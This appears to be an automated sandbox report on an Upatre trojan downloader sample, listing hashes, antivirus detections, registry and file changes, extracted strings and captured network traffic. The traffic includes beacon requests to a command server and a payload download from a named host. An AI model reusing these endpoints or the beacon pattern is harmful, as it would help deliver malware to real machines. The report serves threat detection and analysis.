Analysis Date: 2015-04-07 17:29:24
MD5: 9b2d754b4966068b05dd147b08ce4eae
SHA1: fa34d546ff295dcf0219ef5a382183a724134e77

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 741387be43519c832be664a1aaf47d9b sha1: 598415570c55ec30f4b3f93566168812358c1843 size: 6656
Section .rdata md5: 085fc3b435e3a9ede0c32ec6a8d3b66c sha1: 03dfdd0adf0360a5ff10668aeec39b8225569fc2 size: 1536
Section .data md5: 1d81b13de62ef4318128b9a8c8d2eee2 sha1: 4997cfede9c23c28aa89501f8bb7f0af268d7d3e size: 512
Section .rsrc md5: 7c7bf8baabbb67762814760043a0bd2f sha1: 21ab304121e40eeaafd4248cc9fda58c4f67993f size: 12288
Timestamp: 2011-08-20 13:05:43
Version: LegalCopyright: Copyright by Sunfull Ind.
InternalName: Sunfull
FileVersion: Version 1.3
CompanyName: Sunfull
FileDescription: Sunfull Ind.
OriginalFilename: Sunfull
Packer: Borland Delphi 3.0 (???)
PEhash: 978854d7ae377b5975860a9c01473d694924b12a
IMPhash: 27d5b04244fdde75c1e56fee517018cc
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKD.1934234
AV Alwil (avast): Agent-AUKO [Trj]
AV Arcabit (arcavir): Trojan.GenericKD.1934234
AV Authentium: W32/Trojan.DXKV-8011
AV Avira (antivir): TR/ATRAPS.A.1963
AV BullGuard: Trojan.GenericKD.1934234
AV CA (E-Trust Ino): Win32/Upatre.eWJAPY
AV CAT (quickheal): TrojanDwnldr.Upatre.AA4
AV ClamAV: no_virus
AV Dr. Web: Trojan.Upatre.100
AV Emsisoft: Trojan.GenericKD.1934234
AV Eset (nod32): Win32/TrojanDownloader.Waski.A
AV Fortinet: W32/Upatre.BTC!tr
AV Frisk (f-prot): W32/Trojan3.LNK
AV F-Secure: Trojan-Downloader:W32/Upatre.I
AV Grisoft (avg): Generic36.AGOK
AV Ikarus: Trojan-Downloader.Win32.Upatre
AV K7: Trojan-Downloader ( 0048f6391 )
AV Kaspersky 2015: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Upatre
AV Mcafee: Upatre-FAAA!9B2D754B4966
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre.AA
AV MicroWorld (escan): Trojan.GenericKD.1934234
AV Rising: no_virus
AV Sophos: Troj/Upatre-GJ
AV Symantec: Downloader.Upatre
AV Trend Micro: TROJ_UPATRE.SM37
AV VirusBlokAda (vba32): TrojanDownloader.Upatre

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\nkbbq.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: tnldemo.com
Winsock DNS: cyba3.co.uk
Winsock DNS: 188.165.214.6

Network Details:

DNS: cyba3.co.uk
Type: A
94.136.40.103
DNS: tnldemo.com
Type: A
HTTP GET: http://188.165.214.6:16600/2010dk4/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: testupdate
HTTP GET: http://188.165.214.6:16600/2010dk4/COMPUTER-XXXXXX/1/0/0/
User-Agent: testupdate
HTTP GET: http://cyba3.co.uk/site/2010uk4_.osa
User-Agent: testupdate
HTTP GET: http://cyba3.co.uk/site/2010uk4_.osa
User-Agent: testupdate
Flows TCP: 192.168.1.1:1031 ➝ 188.165.214.6:16600
Flows TCP: 192.168.1.1:1031 ➝ 188.165.214.6:16600
Flows TCP: 192.168.1.1:1032 ➝ 188.165.214.6:16600
Flows TCP: 192.168.1.1:1033 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1034 ➝ 94.136.40.103:80

Raw Pcap
0x00000000 (00000)   47455420 2f323031 30646b34 2f434f4d   GET /2010dk4/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a2074   1..User-Agent: t
0x00000040 (00064)   65737475 70646174 650d0a48 6f73743a   estupdate..Host:
0x00000050 (00080)   20313838 2e313635 2e323134 2e363a31    188.165.214.6:1
0x00000060 (00096)   36363030 0d0a4361 6368652d 436f6e74   6600..Cache-Cont
0x00000070 (00112)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f323031 30646b34 2f434f4d   GET /2010dk4/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f312f30   PUTER-XXXXXX/1/0
0x00000020 (00032)   2f302f20 48545450 2f312e31 0d0a5573   /0/ HTTP/1.1..Us
0x00000030 (00048)   65722d41 67656e74 3a207465 73747570   er-Agent: testup
0x00000040 (00064)   64617465 0d0a486f 73743a20 3138382e   date..Host: 188.
0x00000050 (00080)   3136352e 3231342e 363a3136 3630300d   165.214.6:16600.
0x00000060 (00096)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000070 (00112)   6e6f2d63 61636865 0d0a0d0a 650d0a0d   no-cache....e...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f736974 652f3230 3130756b   GET /site/2010uk
0x00000010 (00016)   345f2e6f 73612048 5454502f 312e310d   4_.osa HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 74657374   User-Agent: test
0x00000050 (00080)   75706461 74650d0a 486f7374 3a206379   update..Host: cy
0x00000060 (00096)   6261332e 636f2e75 6b0d0a43 61636865   ba3.co.uk..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f736974 652f3230 3130756b   GET /site/2010uk
0x00000010 (00016)   345f2e6f 73612048 5454502f 312e310d   4_.osa HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 74657374   User-Agent: test
0x00000050 (00080)   75706461 74650d0a 486f7374 3a206379   update..Host: cy
0x00000060 (00096)   6261332e 636f2e75 6b0d0a43 61636865   ba3.co.uk..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a                         he....


Strings
.
3A9651A1
About Sunfull
Balaklava
Cancel
CompanyName
Copyright by Sunfull Ind.
C:\Users\Tony\AppData\Local\Temp\Temp1_report_46570525484165.zip\report_87324343432432.scr
Default 
Default :
FileDescription
FileVersion
FRIENDS
InternalName
LegalCopyright
MS Shell Dlg
OriginalFilename
Riched32.dll
RICHEDIT
Roman
StringFileInfo
Sunfull
Sunfull Ind.
TeenyWiny
Times New 
Translation
VarFileInfo
Version 1.3
VERY clever
View
VS_VERSION_INFO
0@0@00
0E000@
1	c #77A4E0
2	c #679ADC
3	c #7AA6E1
4	c #195CC6
5	c #FC
6	c #8DB2E4
7	c #4885D6
ADVAPI32.dll
</assembly>
<assemblyIdentity
		<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AVWAf9
b	c #8
bg_col: sepia 
bg_col: transparent 
BROFSH
|	c #8BB3E5
c	c #3D77D0
COMCTL32.dll
CreateFileW
CreateSolidBrush
CreateWindowExW
@.data
d	c #6E9FDD
DefWindowProcW
DeleteObject
</dependency>
<dependency>
	</dependentAssembly>
	<dependentAssembly>
<description></description>
DestroyWindow
DispatchMessageW
@@@@E0@
E@@0000
@@EE@@E@E
E"{R<9	N
ExitProcess
GDI32.dll
GetBkColor
GetCommandLineA
GetMessageW
GetModuleHandleA
GetModuleHandleW
GetProcessHeap
GetStartupInfoA
GetStockObject
GetTempPathW
GetTickCount
       ghij 
HeapAlloc
	However does not remain, and will contain
KERNEL32.dll
        klm 
			language="*"
LoadAcceleratorsW
LoadCursorW
LoadIconW
LoadLibraryW
lstrcatW
lstrcpynW
	name="Company.Product.Name"
			name="Microsoft.Windows.Common-Controls"
name: styleMainWnd 
name: stylePage 
padding: 32 16 
PostQuitMessage
			processorArchitecture="*"
	processorArchitecture="*"
			publicKeyToken="6595b64144ccf1df"
`.rdata
ReadFile
RegCloseKey
RegisterClassExW
RegOpenKeyExA
RegQueryValueExA
see any further changes, except error corrections.
SendMessageW
SetBkColor
SetTextAlign
	some either did not exist, or were not important enough to.
Style [ 
t5YRGX
TextOutW
!This program cannot be run in DOS mode.
TranslateAcceleratorW
TranslateMessage
			type="win32"
	type="win32"
U2%^Fk
USER32.dll
	version="1.0.0.0"
			version="6.0.0.0"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>